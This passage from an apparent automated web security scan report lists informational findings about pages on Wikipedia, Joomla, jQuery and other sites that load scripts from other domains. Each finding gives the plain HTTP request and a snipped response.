Date: Mon, 24 Jan 2011 22:32:28 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.187. http://docs.jquery.com/UI/Sortables

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Sortables

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Sortables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:16 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.188. http://ebookee.org/TrainSignal-Cisco-CCNA-Training-Videos_929461.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ebookee.org
Path:   /TrainSignal-Cisco-CCNA-Training-Videos_929461.html/x22

Issue detail

The response dynamically includes the following script from another domain:
  • http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

Request

GET /TrainSignal-Cisco-CCNA-Training-Videos_929461.html/x22 HTTP/1.1
Host: ebookee.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 24 Jan 2011 14:10:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1284
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head><title>HTTP 404 Not Found</ti
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">
</script>
...[SNIP]...

21.189. http://en.wikipedia.org/wiki/Amazon.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Amazon.com/x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19
  • http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19
  • http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19
  • http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2
  • http://geoiplookup.wikimedia.org/

Request

GET /wiki/Amazon.com/x22 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 15:04:29 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Content-Length: 20593
Content-Type: text/html; charset=UTF-8
Age: 425
X-Cache: HIT from sq66.wikimedia.org
X-Cache-Lookup: HIT from sq66.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

21.190. http://en.wikipedia.org/wiki/American_University_of_Beirut/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/American_University_of_Beirut/x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19
  • http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19
  • http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19
  • http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2
  • http://geoiplookup.wikimedia.org/

Request

GET /wiki/American_University_of_Beirut/x22 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 15:04:31 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Content-Length: 21315
Content-Type: text/html; charset=UTF-8
Age: 425
X-Cache: HIT from sq60.wikimedia.org
X-Cache-Lookup: HIT from sq60.wikimedia.org:3128
X-Cache: MISS from sq59.wikimedia.org
X-Cache-Lookup: MISS from sq59.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

21.191. http://en.wikipedia.org/wiki/Auto_Trader/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Auto_Trader/x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19
  • http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19
  • http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19
  • http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2
  • http://geoiplookup.wikimedia.org/

Request

GET /wiki/Auto_Trader/x22 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 15:04:30 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Content-Length: 20631
Content-Type: text/html; charset=UTF-8
Age: 425
X-Cache: HIT from sq60.wikimedia.org
X-Cache-Lookup: HIT from sq60.wikimedia.org:3128
X-Cache: MISS from sq72.wikimedia.org
X-Cache-Lookup: MISS from sq72.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

21.192. http://en.wikipedia.org/wiki/Strike_Team

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Strike_Team

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19
  • http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19
  • http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19
  • http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19
  • http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2
  • http://geoiplookup.wikimedia.org/

Request

GET /wiki/Strike_Team HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 12 Jan 2011 21:24:15 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Sun, 31 Oct 2010 06:31:11 GMT
Content-Length: 20996
Content-Type: text/html; charset=UTF-8
Age: 1041077
X-Cache: HIT from sq71.wikimedia.org
X-Cache-Lookup: HIT from sq71.wikimedia.org:3128
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

21.193. http://extensions.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=9b5564d7b57848ef22bf9ac141472038; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.194. http://extensions.joomla.org/extensions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /extensions HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=8ce91e96c30d6b3c03ce44895359f0bf; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.195. http://extensions.joomla.org/extensions/advanced-search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/advanced-search

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /extensions/advanced-search HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=662ff80b6519b113832192982b098a5a; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.196. http://extensions.joomla.org/extensions/languages/translations-for-joomla

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/languages/translations-for-joomla

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /extensions/languages/translations-for-joomla HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=119690ae64f99e48cab89680209b4270; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.197. http://extensions.joomla.org/extensions/new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/new

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /extensions/new HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=bd83a0d831a42c661eb59a60c147c8f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.198. http://flowplayer.org/tools/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/

Issue detail

The response dynamically includes the following script from another domain:
  • http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js?foo

Request

GET /tools/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 24 Jan 2011 15:11:51 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Vary: Accept-Encoding
Content-Length: 13114


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/global-0.52.css?foo" />    


                           <script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js?foo"></script>
...[SNIP]...

21.199. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:
  • http://cti.w55c.net/ct/ct-b0e2fed435e243e8a8a841e55341dc2d.js?

Request

GET /activityi;src=2819819;type=retar278;cat=autob211;ord=8268780936487.02? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 24 Jan 2011 21:06:42 GMT
Expires: Mon, 24 Jan 2011 21:06:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 303

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/javascript" src="http://cti.w55c.net/ct/ct-b0e2fed435e243e8a8a841e55341dc2d.js?"></script>
...[SNIP]...

21.200. http://flybase.org/reports/FBgn0000146.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flybase.org
Path:   /reports/FBgn0000146.html/x22

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.getclicky.com/js

Request

GET /reports/FBgn0000146.html/x22 HTTP/1.1
Host: flybase.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:51 GMT
Server: Apache/1.3.26
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 24 Jan 2011 15:11:51 GMT
Content-Type: text/html;charset=UTF-8
set-cookie: BALANCEID=balancer.chervil; path=/;
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 493133


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv
...[SNIP]...
<!-- begin web analytics -->
<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...

21.201. http://forum.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en

Request

GET / HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=3b5661e788faab67f2027dc376b326d5; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
                                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&amp;lang=en"></script>
...[SNIP]...

21.202. http://forum.joomla.org/ucp.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /ucp.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en

Request

GET /ucp.php?mode=register HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=937f6ec303cabbfe9c8df22a65214623; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
                                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&amp;lang=en"></script>
...[SNIP]...

21.203. http://forum.joomla.org/viewforum.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /viewforum.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en

Request

GET /viewforum.php HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
